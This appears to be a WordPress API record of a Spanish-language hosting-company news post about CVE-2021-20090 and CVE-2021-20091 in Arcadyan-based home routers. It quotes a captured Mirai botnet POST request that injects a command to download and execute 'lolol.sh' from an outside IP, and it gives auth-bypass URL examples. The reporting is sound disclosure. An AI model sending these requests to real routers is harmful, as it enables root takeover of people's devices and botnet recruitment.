{"id":100949,"date":"2021-08-09T10:22:57","date_gmt":"2021-08-09T08:22:57","guid":{"rendered":"https:\/\/prohoster.info\/blog\/novosti-interneta\/uyazvimost-v-domashnih-marshrutizatorah-ohvatyvayushhaya-17-proizvoditelej"},"modified":"2021-08-09T10:22:57","modified_gmt":"2021-08-09T08:22:57","slug":"uyazvimost-v-domashnih-marshrutizatorah-ohvatyvayushhaya-17-proizvoditelej","status":"publish","type":"post","link":"https:\/\/prohoster.info\/es\/blog\/news\/uyazvimost-v-domashnih-marshrutizatorah-ohvatyvayushhaya-17-proizvoditelej","title":{"rendered":"Vulnerabilidad en routers dom\u00e9sticos que afecta a 17 fabricantes","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p>Se ha registrado un ataque masivo en routers dom\u00e9sticos cuyas versiones emplean una implementaci\u00f3n del servidor http por parte de Arcadyan. Para obtener control sobre los dispositivos, se utiliza una combinaci\u00f3n de dos vulnerabilidades que permiten ejecutar c\u00f3digo arbitrario de forma remota con privilegios de root. El problema afecta a un amplio rango de routers ADSL de las empresas Arcadyan, ASUS y Buffalo, as\u00ed como a dispositivos suministrados bajo las marcas Beeline (el problema ha sido confirmado en Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone y otros operadores de telecomunicaciones. Se ha destacado que esta vulnerabilidad ha estado presente en las versiones de Arcadyan durante m\u00e1s de 10 a\u00f1os y ha llegado a estar en al menos 20 modelos de dispositivos de 17 fabricantes diferentes.      <\/p>\n<p>La primera vulnerabilidad CVE-2021-20090 permite acceder a cualquier script de la interfaz web sin pasar por la autenticaci\u00f3n. La esencia de la vulnerabilidad radica en que en la interfaz web algunos directorios, a trav\u00e9s de los cuales se entregan im\u00e1genes, archivos CSS y scripts de JavaScript, son accesibles sin autenticaci\u00f3n. La verificaci\u00f3n de los directorios para los cuales se permite el acceso sin autenticaci\u00f3n se realiza mediante una m\u00e1scara inicial. La especificaci\u00f3n de caracteres en las rutas como \u00ab..\\\/\u00bb para retroceder al directorio padre est\u00e1 bloqueada por el firmware, pero el uso de la combinaci\u00f3n \u00ab..\u00bb est\u00e1 permitido. As\u00ed, es posible abrir p\u00e1ginas protegidas al enviar solicitudes como \u00abhttp:\/\/192.168.1.1\/images\/..index.htm\u00bb.    <\/p>\n<p>La segunda vulnerabilidad CVE-2021-20091 permite a un usuario autenticado modificar la configuraci\u00f3n del sistema del dispositivo al enviar par\u00e1metros especialmente formateados al script apply_abstract.cgi, que no realiza la verificaci\u00f3n de la presencia del car\u00e1cter de nueva l\u00ednea en los par\u00e1metros. Por ejemplo, un atacante puede, al ejecutar la operaci\u00f3n ping, especificar en el campo con la direcci\u00f3n IP a comprobar el valor \u00ab192.168.1.2ARC_SYS_TelnetdEnable=1\u00bb y el script, al crear el archivo con la configuraci\u00f3n \/tmp\/etc\/config\/.glbcfg, escribir\u00e1 en \u00e9l la l\u00ednea \u00abAARC_SYS_TelnetdEnable=1\u00bb, que activa <a class=\"wpil_keyword_link\" href=\"https:\/\/prohoster.info\/es\/server\/\"   title=\"servidor\" data-wpil-keyword-link=\"linked\">servidor<\/a> telnetd, proporcionando acceso ilimitado a la l\u00ednea de comandos con privilegios de root. De manera similar, al establecer el par\u00e1metro AARC_SYS se puede ejecutar cualquier c\u00f3digo en el sistema. La primera vulnerabilidad permite ejecutar un script problem\u00e1tico sin autenticaci\u00f3n, accediendo a \u00e9l como \u00ab\/images\/..apply_abstract.cgi\u00bb.           <\/p>\n<p>Para explotar vulnerabilidades, el atacante debe tener la capacidad de enviar una solicitud al puerto de red donde se ejecuta la interfaz web. Seg\u00fan la din\u00e1mica de propagaci\u00f3n del ataque, muchos operadores dejan el acceso desde la red externa en sus dispositivos para facilitar el diagn\u00f3stico de problemas por parte del servicio de soporte. Con un acceso limitado a la interfaz solo para la red interna, el ataque puede llevarse a cabo desde la red externa utilizando la t\u00e9cnica de \"DNS rebinding\". Las vulnerabilidades ya se est\u00e1n utilizando activamente para conectar enrutadores a la botnet Mirai: POST \/images\/..apply_abstract.cgi HTTP\/1.1 Connection: close User-Agent: Dark action=start_ping&amp;submit_button=ping.html&amp; action_params=blink_time5&amp;ARC_ping_ipaddress=212.192.241.7 ARC_SYS_TelnetdEnable=1&amp; ARC_SYS_=cd+\\\/tmp; wget+http:\\\/\\\/212.192.241.72\\\/lolol.sh; curl+-O+http:\\\/\\\/212.192.241.72\\\/lolol.sh; chmod+777+lolol.sh; sh+lolol.sh&amp;ARC_ping_status=0&amp;TMP_Ping_Type=4<br \/>\n<br \/>Fuente: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/www.opennet.ru\/opennews\/art.shtml?num=55609\">opennet.ru<\/a> <\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u0412 \u0441\u0435\u0442\u0438 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u043c\u0430\u0441\u0441\u043e\u0432\u0430\u044f \u0430\u0442\u0430\u043a\u0430 \u043d\u0430 \u0434\u043e\u043c\u0430\u0448\u043d\u0438\u0435 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u044b, \u0432 \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0430\u0445 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f http-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u043e\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Arcadyan. \u0414\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043d\u0430\u0434 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u0442\u0441\u044f \u0441\u043e\u0447\u0435\u0442\u0430\u043d\u0438\u0435 \u0434\u0432\u0443\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0445 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 root. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u0441\u043f\u0435\u043a\u0442\u0440 ADSL-\u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u043e\u0432 \u043e\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 Arcadyan, ASUS \u0438 Buffalo, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432, \u043f\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u043c\u044b\u0445 \u043f\u043e\u0434 \u0431\u0440\u0435\u043d\u0434\u0430\u043c\u0438 \u0411\u0438\u043b\u0430\u0439\u043d (\u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0430 [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[702],"tags":[],"class_list":["post-100949","post","type-post","status-publish","format-standard","hentry","category-news"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.2 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u0412 \u0441\u0435\u0442\u0438 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u043c\u0430\u0441\u0441\u043e\u0432\u0430\u044f \u0430\u0442\u0430\u043a\u0430 \u043d\u0430 \u0434\u043e\u043c\u0430\u0448\u043d\u0438\u0435 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u044b, \u0432 \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0430\u0445 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f http-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u043e\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Arcadyan.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/es\/blog\/news\/uyazvimost-v-domashnih-marshrutizatorah-ohvatyvayushhaya-17-proizvoditelej\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.2\" \/>\n\t\t<meta property=\"og:locale\" content=\"es_ES\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0434\u043e\u043c\u0430\u0448\u043d\u0438\u0445 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u0445, \u043e\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u044e\u0449\u0430\u044f 17 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u0435\u0439 | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u0412 \u0441\u0435\u0442\u0438 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u043c\u0430\u0441\u0441\u043e\u0432\u0430\u044f \u0430\u0442\u0430\u043a\u0430 \u043d\u0430 \u0434\u043e\u043c\u0430\u0448\u043d\u0438\u0435 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u044b, \u0432 \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0430\u0445 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f http-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u043e\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Arcadyan.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/es\/blog\/news\/uyazvimost-v-domashnih-marshrutizatorah-ohvatyvayushhaya-17-proizvoditelej\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2021-08-09T08:22:57+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2021-08-09T08:22:57+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47Vulnerabilidad en enrutadores dom\u00e9sticos que abarca a 17 fabricantes | ProHoster","description":"Se ha registrado un ataque masivo en la red dirigido a enrutadores dom\u00e9sticos que utilizan la implementaci\u00f3n del servidor http de la empresa Arcadyan en su firmware.","canonical_url":"https:\/\/prohoster.info\/es\/blog\/news\/uyazvimost-v-domashnih-marshrutizatorah-ohvatyvayushhaya-17-proizvoditelej","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"es_ES","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0434\u043e\u043c\u0430\u0448\u043d\u0438\u0445 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u0445, \u043e\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u044e\u0449\u0430\u044f 17 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u0435\u0439 | ProHoster","og:description":"\u0412 \u0441\u0435\u0442\u0438 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u043c\u0430\u0441\u0441\u043e\u0432\u0430\u044f \u0430\u0442\u0430\u043a\u0430 \u043d\u0430 \u0434\u043e\u043c\u0430\u0448\u043d\u0438\u0435 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u044b, \u0432 \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0430\u0445 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f http-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u043e\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Arcadyan.","og:url":"https:\/\/prohoster.info\/es\/blog\/news\/uyazvimost-v-domashnih-marshrutizatorah-ohvatyvayushhaya-17-proizvoditelej","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2021-08-09T08:22:57+00:00","article:modified_time":"2021-08-09T08:22:57+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"100949","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":null,"breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-08-09 08:52:28","updated":"2022-10-01 01:24:53","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/posts\/100949","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/comments?post=100949"}],"version-history":[{"count":1,"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/posts\/100949\/revisions"}],"predecessor-version":[{"id":172937,"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/posts\/100949\/revisions\/172937"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/media?parent=100949"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/categories?post=100949"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/tags?post=100949"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}